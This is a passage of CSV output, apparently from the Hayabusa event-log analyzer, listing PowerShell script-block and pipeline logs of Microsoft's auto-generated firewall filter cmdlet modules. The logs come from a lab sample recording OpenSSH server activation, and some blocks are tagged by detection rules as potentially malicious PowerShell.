$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Set-NetFirewallAddressFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.250 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 
'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = 
$null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.251 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.252 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.253 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.253 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.299 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.299 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if 
